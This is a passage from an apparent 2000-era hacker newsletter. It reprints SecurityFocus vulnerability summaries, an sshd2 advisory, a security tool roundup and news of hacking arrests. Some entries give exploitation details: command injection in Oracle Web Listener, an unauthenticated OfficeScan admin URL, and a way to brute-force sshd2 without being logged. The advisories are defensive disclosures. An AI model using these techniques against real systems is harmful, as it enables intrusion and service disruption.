6. Oracle Web Listener Batch File Vulnerability BugTraq ID: 1053 Remote: Yes Date Published: 2000-03-15 Relevant URL: http://www.securityfocus.com/bid/1053 Summary: Oracle Web Listener for NT makes use of various batch files as cgi scripts, which are stored in the /ows-bin/ directory by default. Any of these batch files can be used to run arbitrary commands on the server, simply by appending '?&' and a command to the filename. The command will be run at the SYSTEM level. The name of a batch file is not even neccessary, as it will translate the '*' character and apply the appended string to every batch file in the directory. Moreover, UNC paths can be used to cause the server to download and execute remote code. 7. Checkpoint Firewall-1 Internal Address Leakage Vulnerability BugTraq ID: 1054 Remote: Yes Date Published: 2000-03-11 Relevant URL: http://www.securityfocus.com/bid/1054 Summary: A vulnerability exists in which Checkpoint Firewall-1 will expose internal addresses to machines outside the network. Under seemingly normal load conditions, according to the poster of this vulnerability, 40% CPU utilization with 200+ active connections, Firewall-1 will attempt to establish connections utilizing the internal address. As this address is either non-routable, or internal, a retransmission will occur; this packet will have the correct address rewritten, but will use the same source port. Using this information makes it easy to determine the firewall behind which this address resides, as well as the internal address of the machine being utilized to establish the connection being seen. This may be particularly useful to attackers conducting client side attacks. These problems have been seen on both NT and Solaris versions of FW-1, although the poster indicated that not enough data was available to directly state the Solaris version was vulnerable in the same ways, or to the same degrees. 8. Microsoft SQL Weak Password Encryption Vulnerability BugTraq ID: 1055 Remote: No Date Published: 2000-03-14 Relevant URL: http://www.securityfocus.com/bid/1055 Summary: If 'Always prompt for login name and password' is not set, and Windows Integrated Security is not being used, Enterprise Manager for SQL Server 7 will save the login ID and password in the registry key HKCU\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server X. The algorithm used to encrypt the password consists of XORing each character with a two byte value dependant on the character's position in the string. If 'Always prompt for login name and password' is set, or Windows Integrated Security is used, the ID and password are not saved at all. 9. Atrium Software Mercur WebView WebMail-Client Buffer Overflow Vulnerability BugTraq ID: 1056 Remote: Yes Date Published: 2000-03-16 Relevant URL: http://www.securityfocus.com/bid/1056 Summary: WebView WebMail-Client is an add-on for the Mercur SMTP/POP3/IMAP4 Mail Server which allows a user to access email through a web browser. Insufficient boundary checking exists in the code which handles GET requests, specifically on port 1080. Issuing a GET request containing a string of over 1000 characters on port 1080 will cause the WebView WebMail-Client application to crash. eg. http: file://target/&mail_user= 10. Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability BugTraq ID: 1057 Remote: Yes Date Published: 2000-03-16 Relevant URL: http://www.securityfocus.com/bid/1057 Summary: Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. During the installation of the management software, the administrator is asked to choose between managing from a webserver or from a fileserver. If the webserver option is chosen, the administrator is given the capability to manage the OfficeScan network through an HTML interface. This can be accessed by requesting the authentication form which is located at http: file://target/officescan/. It prompts the user for the admin password, however it is transmitted in plaintext which can be intercepted by any user on the network running a packet sniffer specifically searching for the string "TMLogon=". A larger problem exists in that any user with access to the web server is able to perform administrative functions without any sort of authorization simply by requesting specific URLs. This is accomplished by requesting certain CGI files such as jdkRqNotify.exe. A request for jdkRqNotify.exe in conjunction with a domain name on the network and an administrative event code number would allow any user on the network to perform certain administrative duties. eg. http://target/officescan/cgi/jdkRqNotify.exe?domain=&event= Examples of event code numbers are: 11: Scan now 12: Uninstall 14: Roll back 15: New alert message 16: New intranet proxy 17: New privilege 18: New protocol 19: New password 20: New client III. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES -------------------------------------------- 1. The Coming Linux Plague (March 13, 2000) URL: http://www.securityfocus.com/commentary/2 2. The Fine Print in UCITA (March 16, 2000) URL: http://www.securityfocus.com/commentary/4 3. Sex Site Billing Companies Targeted By Russian Cybercrime (March 13, 2000) URL: http://www.securityfocus.com/news/3 4. Information Freedom Catching On (March 16, 2000) URL: http://www.securityfocus.com/news/5 5. Vast online credit card theft revealed (March 17, 2000) URL: http://www.msnbc.com/news/382561.asp 6. Hacker Finds a New Home for Stolen Cards (March 17, 2000) URL: http://www.internetnews.com/ec-news/article/0,1087,4_323241,00.html IV. INCIDENTS SUMMARY ---------------------- 1. Munged Napster Sessions (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314021712.CF91B106FB@schadenfreude.meshuggeneh.net 2. Undernet/telnet attempts? (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=75B741AEA780D3118D6500508B4499A001965C75@cadillac.office.wxs.nl 3. Strange RPC? service entries. (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313095534.5770.0@argo.troja.mff.cuni.cz 4. ingreslock message (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=38CD2727.26D3F760@RZ.RWTH-Aachen.DE 5. lots of interest in port 109 (POP2) (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000313205308.24475.qmail@securityfocus.com 6. Mail and web server attack (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314135432.1709.qmail@securityfocus.com 7. Firewall (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=Pine.GUL.4.21.0003142235580.21371-100000@red1.cac.washington.edu 8. TCP port 3218 (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=20000314232752.A6369@stwing.upenn.edu 9. Odd UPD scan (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=BC60D9A2A99CD311BB6B009027B09D2F02CE85@sea1sa02.punchnetworks.com 10. DUP packet replies at tvguide.com (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=200003151649.LAA18294@granger.mail.mindspring.net 11. Cracked; rootkit - entrapment question? (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-8&thread=D6C7B533F7C4D311BBD800001D121E7F0152D9@clmail.cmccontrols.com 12. pop-2 scanning (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=20000315192246.524.qmail@securityfocus.com 13. Looking for Squid Proxies (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=200003161445.GAA01133@cwsys.cwsent.com 14. TCP port 3218 (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316120331.G.E.Fowler@lboro.ac.uk 15. what are these? (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=75&date=2000-03-15&thread=XFMail.20000316232929.djk@tobit.co.uk V. VULN-DEV RESEARCH LIST SUMMARY --------------------------------- 1. Unwanted automagic processing (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=12UQKA-0005iM-00@gate.westel900.hu 2. MS Frontpage shtml.dll Path Leak Vulnerability (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=JEENLNLIMOLKDGAHKOCHEEPODAAA.marc@eeye.com 3. Hotline (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBJPBMKLJJBCHBNEAIOEIGCCAA.jlintz@optonline.net 4. Crashing Win9x (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315085426.29030.cpmta@c008.sfo.cp.net 5. NT 4.0 (Workstation) Logon Authentication Vulnerability (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=NDBBIKOFOLKHBDNJIAKCEEJJCCAA.mrousseau@secured.org 6. Crashing Win9x with smbclient (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=20000315104542.B28738@trillian.adap.org 7. Intel Corporation, Express 550 (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.LNX.4.10.10003151605360.32739-100000@inetarena.com 8. spoofing the ethernet address (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-8&thread=Pine.GSO.4.21.0003151412230.21920-100000@campus 9. Linux Mandrake 6.1 PAM/userhelper exploit (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D169B5.5B1E1727@nitnet.com.br 10. Exploiting any network protocol with secondary data channels (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D1FECA.6954A347@enternet.se 11. Buffer overflow in AIM 3.5.1856 (Thread) URL: http://www.securityfocus.com/templates/archive.pike?list=82&date=2000-03-15&thread=38D52362.D0B1AEF2@rit.edu VI. SECURITY JOBS SUMMARY 2000-03-13 to 2000-03-20 --------------------------------------------------- This section is unavailable this week - missed entries will be included in next weeks 'week in review'. VII. SECURITY SURVEY 2000-03-13 to 2000-03-20 ----------------------------------------------- Which remote accessing service presents the greatest security risks? RPC/DCOM 21% / 34 votes Web (including CGI) 28% / 45 votes SSH 2% / 4 votes FTP 5% / 8 votes NFS/NETBIOS 20% / 32 votes Telnet (incoming) 20% / 32 votes Total number of votes: 156 votes VIII. SECURITY FOCUS TOP 6 TOOLS 2000-03-13 to 2000-03-20 -------------------------------------------------------- 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) by RedShadow Relevant URL: http://www.rsh.kiev.ua Shadow Advantis Administator Tools - Ping (SSPing), Port Scanner, , IP Scanner, Site Info (is intended for fast definition of services started on the host), Network Port Scanner,Tracert, Telnet,Nslookup, Finger,Echo,Time,UPD test,File Info, Compare File, Netstat, SysInfo,Crypt, Crc File, DBF view/edit, DiskInfo, NTprocess, Keyboard test, DNS info Shadow Hack and Crack - WinNuke, Mail Bomber,POP3,HTTP,SOCKS,FTP Crack (definitions of the password by a method of search),Unix password Crack, Finger over SendMail, Buffer Overlow , Smb Password Check , CRK Files ShadowPortGuard - code for detection of connection on the certain port Shadow Novell NetWare Crack - code for breakings Novell NetWare 4.x And more other functions 2. SecurityFocus.com Pager (Win95/98/NT) by SecurityFocus.com Relevant URL: http://www.securityfocus.com/pager/sf_pgr20.zip This program allows the user to monitor additions to the Security Focus website without constantly maintaining an open browser. Sitting quietly in the background, it polls the website at a user-specified interval and alerts the user via a blinking icon in the system tray, a popup message or both (also user-configurable). 3. Cold Fusion Scan 1.0 (Win95/98/NT) by icos@arez.com Relevant URL: http://www.securityfocus.com/data/tools/cfscan.zip Cold Fusion vulnerability scanner is a program that will run down a list of words/domain names, and scan each one for an Allaire Cold Fusion misconfiguration. 4. Atlas 1.0 (Win95/98) by Digital Monkey, dmonkey@arctik.com Relevant URL: http://www.securityfocus.com/data/tools/Atlas.zip A Windows/MS-DOS CGI scanner (binary only) which scans for 65 remote vulnerabilities. 5. kfirewall 0.4.2 (Linux) by Kim Andre Norheim, kim-nor@online.no Relevant URLS: http://www.securityfocus.com/data/tools/kfirewall-0.4.2.tar.gz http://megaman.ypsilonia.net/kfirewall/ kfirewall is a GUI front end for ipchains or ipfwadm (depending on your kernel version), in version 0.4.0 ipfwadm is removed. You can quickly and easily protect your computer against attacks and blocking of ports. kfirewall is easy and fast in use. 6. cgi scanner 3.6 (UNIX/PERL) by CKS Relevant URLS: http://www.securityfocus.com/data/tools/auditing/network/cgichk3_6.tgz http://www.singnet.com.sg/~cksss/ Cgi Scanner 3.6 is a simple program which facilitates the scanning of hosts on a network for known cgi vulnerabilities. Upon finding a given cgi program, the script will optionally download information from the author's web page, detailing the exploit. 3.6 includes a fix for a y2k problem in previous versions that would cause numerous false positives. IX. SPONSOR INFORMATION - SecurityFocus.com -------------------------------------------- SecurityFocus.com, the premier security information portal, has a new look and more in-depth security content. Check out our redesigned site and new Solaris Focus Area. Get the latest info on securing the Solaris OS--news, vulnerabilities, white papers--in one, easy-to-navigate area. Click the Solaris tab on the home page. SecurityFocus.com-It's all here and it's all free. X. SUBSCRIBE/UNSUBSCRIBE INFORMATION ------------------------------------- 1. How do I subscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body of: SUBSCRIBE SF-NEWS Lastname, Firstname You will receive a confirmation request message to which you will have to anwser. 2. How do I unsubscribe? Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed address with a message body of: UNSUBSCRIBE SF-NEWS If your email address has changed email aleph1@securityfocus.com and I will manualy remove you. 3. How do I disable mail delivery temporarily? If you will are simply going in vacation you can turn off mail delivery without unsubscribing by sending LISTSERV the command: SET SF-NEWS NOMAIL To turn back on e-mail delivery use the command: SET SF-NEWS MAIL 4. Is the list available in a digest format? Yes. The digest generated once a day. 5. How do I subscribe to the digest? To subscribe to the digest join the list normally (see section 0.2.1) and then send a message to LISTSERV@SECURITYFOCUS.COM with with a message body of: SET SF-NEWS DIGEST 6. How do I unsubscribe from the digest? To turn the digest off send a message to LISTSERV with a message body of: SET SF-NEWS NODIGEST If you want to unsubscribe from the list completely follow the instructions of section 0.2.2 next. 7. I seem to not be able to unsubscribe. What is going on? You are probably subscribed from a different address than that from which you are sending commands to LISTSERV from. Either send email from the appropiate address or email the moderator to be unsubscribed manually. Alfred Huger VP of Engineering SecurityFocus.com @HWA 116.0 You can get into trouble for hacking! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This piece comes from the Dept of Justice website, quite amusing actually.. Submitted by Sugarking http://www.usdoj.gov/kidspage/do-dont/reckless.htm YOU CAN GET IN REAL TROUBLE FOR HACKING! Some kids think they can't get into trouble for hacking computer systems and that hacking big networks like the phone company, the military, or NASA is harmless fun. But that's not true, as one teenager in Boston found out recently. The hacker and some of his friends found a way to hack into a computer that belongs to the phone company and that directs telephone traffic in the Boston area. After he got into the system, the hacker decided to reboot the computer, which basically made it crash. The first time he did this, the hacker completely shut off phone service for six hours to a regional airport so that the air traffic control tower had an extrememly hard time communicating. The second time he crashed the computer, he cut off phone service to about 600 homes. The phone company reported this to the United States Secret Service, which investigated the case and indentified all the kids involved. Although the Justice Department does not prosecute juveniles very often, the United States Attorney's Office in Boston charged the ringleader of the group with several serious crimes. Even though the student won't go to jail, he did receive very serious punishment: he lost his computer, must pay $5000 to the telephone company, and must work in the community for free for 250 hours. He will also be on probation for the next two years, and during that time he is not allowed to use any computer with a modem. That means, of course, that he is off the Internet and all other networks. DON'T LET THIS HAPPEN TO YOU! If you think about it, it's pretty easy to see why this student got into so much trouble. How would you feel if you were one of the 600 houses that lost phone service? What if you needed to call 911? How would you feel if you had been flying into the airport that lost telephone service? The best way to stay out of trouble with computers is to imagine before you do something how you'd feel if someone did it to you. You wouldn't like it if someone opened your mail or looked into your bedroom windows, and if you wouldn't do this either, don't hack into computers. Lots of kids know enough about computers to hack into big networks, but so what? It doesn't mean you're smart, it just means you don't mind hurting other people--because it does hurt them. People are not going to want to hire you to protect computers if you've been a hacker. It's a question of trust, not skill. If you like computers, don't use your brains to hack systems, invade other people's privacy, and take away their networks. Hacking can get you in a whole lot more trouble than you think and is a completely creepy thing to do. If you're so smart, use that computer to do great things! @HWA 117.0 SSHD v2.0.11< (old) Watch your version numbers! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: (Bugtraq Archives) http://msgs.securepoint.com/cgi-bin/get/bugtraq9905/75.html Yes this IS old. But its here because recently someone was upgrading from using ssh1 to ssh2 and almost installed an older version thinking that any ssh2 implementation was secure (no names *wink*) so i've put this here to remind people that knew and advise those that were unaware of the possible threat... - Ed Forum: BUGTRAQ (Admin) Date: 1999, May 13 From: Patrick Oonk Found this at http://www.jjf.org/advisory/SshdJJFen.txt - J.J.F. / Hackers Team - Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: 05/09/1999 Release: 05/14/1999 Author: Zhodiac URL: http://www.jjf.org Application: sshd2 up to 2.0.11 OS: Unix Risk: Risky :), long term could gain system access. -=-=-=-=-=-=-=-= Introduction -=-=-=-=-=-=-=-= In the default instalation of sshd2 (up to 2.0.11) there is an open way to bruteforce a login/password, without any kind of ip logging by the sshd. Version 2.0.12 and newers seems to be not vulnerable to this attack, because it logs the ip at connection time. -=-=-=-=-=-=-=-= Details -=-=-=-=-=-=-=-= When a ssh client connects to the daemon, it has a number (default is three) of attempts to guess the correct password before disconnecting. If we shutdown the connection before using up the number of attempts, the daemon will not log neither the connection, the password guesses nor the ip of the client. One cristal clear example: [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: Disconnected; authentication error. [zhodiac@piscis zhodiac]$ In /var/log/messages: May 9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')' Now we try the bug: [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: FATAL: Received signal 2. [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: FATAL: Received signal 2. [zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis zhodiac's password: zhodiac's password: zhodiac's password: FATAL: Received signal 2. [zhodiac@piscis zhodiac]$ Those "FATAL: Received signal2." are the response of interrupting the program with a ^C. Lets see what syslog did: May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed. May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed. May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed. No ip, no password guesses attempts on the logs! So a bruteforce can be done without any kind of logging... Sorry script-kiddies, no program available! -=-=-=-=-=-=-=-= Quick Fix -=-=-=-=-=-=-=-= Edit the file sshd2_config (usually at /etc/ssh2), set the value of "PasswordGuesses" to 1. With this each time a password is tried it will log it in the following way: May 9 12:46:07 piscis sshd[1308]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1527', requested service 'ssh-connection')' It is also recommended to set the value of "ListenAddress" so we will have more control of which ips can use our ssh service. A better solution is to upgrade to 2.0.12 version or newer , with them at connection it will log via syslog in the following way: May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1" -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- zhodiac@jjf.org http://www.jjf.org - J.J.F. / Hackers Team - Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -- Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick Pine Internet B.V. Consultancy, installatie en beheer Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- Excuse of the day: Feature was not beta tested @HWA 118.0 BBC:"Outdoing the hackers" ~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by MerXor Source:http://news2.thls.bbc.co.uk/hi/english/business/newsid%5F689000/689285.stm Friday, 24 March, 2000, 18:02 GMT Outdoing the hackers By BBC News Online's Iain Rodger Imagine a team of people spending all their time thinking up ways of hacking into corporate computer networks. Now imagine them, Mission Impossible-style, breaking into the inner sanctum itself - the main computer room. These teams actually exist and, more remarkably, they work largely from within the big firms of accountants. Known as "tiger teams", their brief is to find the holes in the security of their corporate clients before criminal hackers do. Brick trick Jan Babiak is head of Ernst & Young's IT security practice. She told me how one of her firm's tiger teams broke into the computer room of a major North American client, deposited a brick marked "Ernst & Young was here" and left again undetected. They then contacted the firm's bosses and said: "Come and see what we've done." What a great job, don't you think? Kind of James Bond without the disincentive of being shot at. But, of course, it's not quite as simple as that. Most of the time, the teams are methodically trying to crack passwords to find a chink in the armour of supposedly secure sites. Chris Potter, partner in charge of similar operations at Pricewaterhouse Coopers, said his 50-strong UK team mainly tries to replicate the techniques of illegal hackers to probe here and there until weaknesses are identified. Physical break-ins would be rare, he said, and used only when the client had agreed it was appropriate. Jan Babiak also stressed the importance of not being alarmist: "The smartest thing to do is to understand your risks." Then, she said, you can develop cost-effective responses that deal with the risk in a way that "delivers good value to shareholders". Now there's the accountant speaking. How it's done Often using people with backgrounds in military espionage, tiger teams (the name is derived from the American armed forces) use all kinds of tricks to ply their trade. For example, they might mount an attempt to hack into a company round the corner via servers dotted all over the world, making it virtually impossible to detect where the attack is coming from. As the idea is to find the weaknesses in even the most sophisticated security, a wide range of techniques might be used, from wire-tapping to cracking passwords. A small programme might be secreted on the target system which records and transmits keystrokes from given terminals. On the basis that the password is typed within the first 40 keystrokes, it is then relatively easy to find. But, as Chris Potter says, the biggest weaknesses are usually not in the technology but in the "human element", and this is where the other side, known as "social engineering" comes in. In one case, a female member of a tiger team used the age-old weapon of tears to persuade an employee of a target client to give her password details. In another, a visit to an office masquerading as a cleaner was used to obtain information about personal belongings placed around work terminals. Some Arsenal football club pictures were enough of a clue to make cracking the employee's password easy work. Making robust systems Having identified the weaknesses, the team then gives advice on how to change the security system to make it more effective, or even design a system specifically for the client. Ken Cukier, international editor with technology magazine Red Herring, says the tiger teams provide an essential service in developing robust IT infrastructures. The business is certainly growing fast - Ernst & Young's team has quadrupled in size in two years. But Mr Cukier says the talents needed to design a secure system and break that security are not the same, so there needs to be a three-pronged approach to get the best results. He says the tiger teams are great for checking that a system works, but that they tend to rely on long experience of established technques. Bright young things This can miss out the new ways of hacking being thought up by bright young things messing about with cutting-edge technology on the fringes of Silicon Valley. Many of them do not want to work for multinational firms and have been founding their own internet start-ups, realising that they have highly marketable skills. Mr Cukier says combining the tiger teams with the bright young things, along with awareness of the need for constant monitoring of how hacking techniques are changing, produces the best results. He says: "The best you can ever hope for is to be one step ahead of the hackers." @HWA 119.0 HNN:Mar 27th:Curador Busted In Wales (See section 110.0 for more) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Curador (Raphael Gray), suspected of stealing thousands of credit cards from at least nine e-commerce sites and posting them to the Internet , was arrested in Wales last week. Some of Curador's victims included Promobility, a wireless phone merchant in Ontario; SalesGate.com in Buffalo, New York; LTA Media LLC in Knoxville, Tennessee; and Feelgoodfalls.com in Denver. Curador and his accomplice are expected to be charged under Britain's Computer Misuse Act of 1990 for the theft and fraudulent use of more than 26,000 credit card numbers. Additional charges may be filed within the United States. (Some news outlets are reporting that Curador got a hold of Bill Gates Credit Card info. This was proven to be false several weeks ago. It looks like the UK Telegraph was the first to mention it, and of course several of the wire services picked it up without verifying the information. Don't believe everything you read.) Internet News Associated Press - via Yahoo Reuters BBC CNN C|Net MSNBC UK Telegraph Attrition.org - Mirrors of Curador's Web Sites http://www.internetnews.com/ec-news/article/0,2171,4_327181,00. http://dailynews.yahoo.com/h/ap/20000324/tc/hackers_england_2. http://dailynews.yahoo.com/h/nm/20000324/wr/tech_hackers_1.html http://news2.thls.bbc.co.uk/hi/english/uk/wales/newsid%5F689000 http://www.cnn.com/2000/TECH/computing/03/24/hackers.wales/ http://news.cnet.com/news/0-1007-200-1583595.html?tag http://export.msnbc.com/news/386402.asp http://www.telegraph.co.uk/et?ac http://www.attrition.org/mirror/attrition/curador.html ---------- @HWA 120.0 HNN:Mar 27th:Inferno Busted in Brazil ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jackie Chan The Inferno.br, one of the main underground groups in Brazil, was dismantled last Tuesday by the Sector of Crimes for the Internet of the Civil Policy of Sao Paulo. One of the leaders of the group, known as Jamiez Jamiez or JZ, was apprehended at his residence and had his computer and all related material confiscated. The Inferno had been active since September of 1998 and has taken credit for the defacement of several web pages. Agents involved with the case claim that Microsoft helped them in gaining access to the groups Hotmail account. Investigators expect more arrests of group members in the next few days. (Note: Information for this article was gathered from a Babelfish Translation and may not be perfect.) IDG Brazil - Portuguese Attrition - Mirrors of Inferno.br Defacements http://www.uol.com.br/idgnow/inet/inet2000-03-23g.shl http://www.attrition.org/mirror/attrition/inferno.html ---------- @HWA 121.0 HNN:Mar 27th:OSU Students Accused of Stealing Bandwidth ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by lannachi Payne County prosecutors have accused four Oklahoma State University students of computer fraud. The charges arose after the students ran a cable from a university computer lab to their rooms in Stout Hall. The students were arraigned last week for violation of the computer crimes act. Tulsa World - at bottom of page http://search.tulsaworld.com/archivesearch/default.asp?WCI ---------- Server object error 'ASP 0177 : 800a2330' Server.CreateObject Failed /archivesearch/default.asp, line 13 The operation completed successfully. ( IOW: it's a 404 ... sorry... BTW if anyone finds, has cached or otherwise stored any missing stories please email the article to me and please reference section # and Issue # ie: 121.0 Issue #52 ... and i'll post it in a future release. Thanks. - Ed ) @HWA 122.0 HNN:Mar 27th:PalmPilot WarDialer Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Kingpin Vaporware for almost two years the PalmPilot WarDialer known as TBA has been released by Kingpin from L0pht Labs at @Stake. This release expands the possibilities of security scanning and is much cheaper than commercial alternatives, it is FREE. L0pht Labs Palm OS Development http://www.l0pht.com/~kingpin/pilot.html ---------- @HWA 123.0 HNN:Mar 27th:Mi5 Computer Stolen ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by dubpunk It is crucial to remember that your computer security is only as good as your physical security. MI5, the British Secret Service, has announced that it will tighten its security procedures after a laptop was recently stolen from an agent. MI5 admitted that the laptop may contain information related to Northern Ireland but that it does not contain any sensitive material. This is London Reuters - via Iwon http://www.thisislondon.com/dynamic/news/reprint.html?in_review http://www.iwon.com/home/technology/tech_article/0,2109,23766|technolo gy|03-24-2000::23:52|reuters,00.html ---------- ORA-06550: line 3, column 11: PLS-00306: wrong number or types of arguments in call to 'F_VANILLA_REVIEW' ORA-06550: line 3, column 1: PL/SQL: Statement ignored (*SIGH* and ho-hum.. not having a lot of luck capturing articles from some of these new news sites recently!... 404 again on 1st url ... 'thisislondon*' ...sorry... - Ed ) -=- British Intelligence Laptop Stolen at Station March 24, 2000 10:51 am EST LONDON (Reuters) - British police said Friday they were hunting a thief who had stolen a secret service computer containing confidential information on Northern Ireland. The laptop computer was snatched while an employee of Britain's domestic security service, MI5, was buying a ticket at London's Paddington train station. "I can confirm that a laptop computer was stolen from the security service employee on March 4 at Paddington Underground (station)," said a government official who declined to be identified. "The information contained in the laptop was well protected and we believe it to be secure. We are not prepared to discuss the nature of the material." The information on the computer was understood to be heavily encrypted and was related to the situation in Northern Ireland, but not to refer to the state of the peace process or any guerrilla threat. A spokesman for Prime Minister Tony Blair said officials were always concerned at the loss of any sensitive material, but they were confident it was secure and that national security had not been threatened. "We believe this is an opportunistic theft and not a deliberate attempt to gain access to security service information," he said. Asked why agents were walking around with security information on computers, the spokesman said there were strict procedures for moving classified material. "You can certainly say they've been tightened since this incident," he added. The Sun newspaper said a squad of 150 police were working around the clock to catch the thief. Before the start of the 1991 Gulf War in Kuwait and Iraq, a laptop said to have contained war plans was stolen from the car of a Royal Air Force officer, who lost his job as a result. The latest theft comes as the peace process in Northern Ireland is in disarray. Last month Britain decided to suspend a fledgling home-rule government over lack of progress on disarmament by Irish Republican Army guerrillas. (For those of you not living in the United Kingdom or Ireland, this is a VERY BAD SCENE to have happen, Brits live in fear of the threat of terrorist bomb attacks on a daily basis and any intelligence to help the murdererous IRA and rogue factions could be devestating to any hope of peace in the UK and Northern Ireland ... - Ed) @HWA 124.0 HNN:Mar 27th:"HNN Wins Bad Ass Media Award" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by SmackDabMedia Mail The Hacker News Network has won the prestigious Bad Ass Media Site of the Week awarded by Smack Dab Media. Smack Dab Media http://www.smackdabmedia.com/badassmediasiteoftheweek.html?004 ---------- (Sorry! article has moved! who knows where!? - Ed ...) @HWA 125.0 HNN:Mar 28th:French Ban Anonymous Internet ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The French National Assembly has voted on a bill to ban anonymous web hosting. Providing false information to an Internet service provider could result in a six month jail sentence. The Assembly will take one more vote on the bill before it becomes law. French National Assembly - PDF in French http://www.assemblee-nat.fr/2/pdf/ta0473-01.pdf ---------- @HWA 126.0 HNN:Mar 28th:Canada Labeled Hot bed of Computer Terrorism ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles An American intelligence agency has determined that up to 80 percent of foreign attacks on U.S. computers either originate or pass through Canada. The claim follows suspicions that some recent attacks were routed through Canadian computers. E-Commerce Times News Bytes http://www.ecommercetimes.com/news/articles2000/000327-nb1.shtml http://www.newsbytes.com/pubNews/00/146343.html ---------- Canada Called Hotbed of Cyberterrorism By Martin Stone, Newsbytes Special to the E-Commerce Times March 27, 2000 An American intelligence agency has determined that up to 80 percent of foreign attacks on U.S. computers either originate or pass through Canada. The claim follows suspicions that some recent hacker attacks were routed through Canadian computers. A weekend article by the Ottawa Citizen newspaper said a report prepared last year for Canada's Department of National Defence quotes the U.S. Defence Intelligence Agency, the military counterpart to the CIA, as warning that Canada is seen as a "Zone of Vulnerability." The U.S. Defence Intelligence Agency estimates that a full 80 percent of the attacks upon U.S. systems originate in or pass through Canada, the report stated. The Citizen noted that the report, prepared by Canadian military and intelligence agencies, including the ultra-secret Communications Security establishment, further said, "It is the assessment of the (Canadian government's) Intelligence Policy Group that the United States and our allies will expect Canada to participate in combating and reducing the cyber threat." Hacker Haven FBI Director Louis Freeh recently called Canada a "hacker haven." FBI investigators believe one or more Canadian Internet servers were used in the attacks that recently disabled 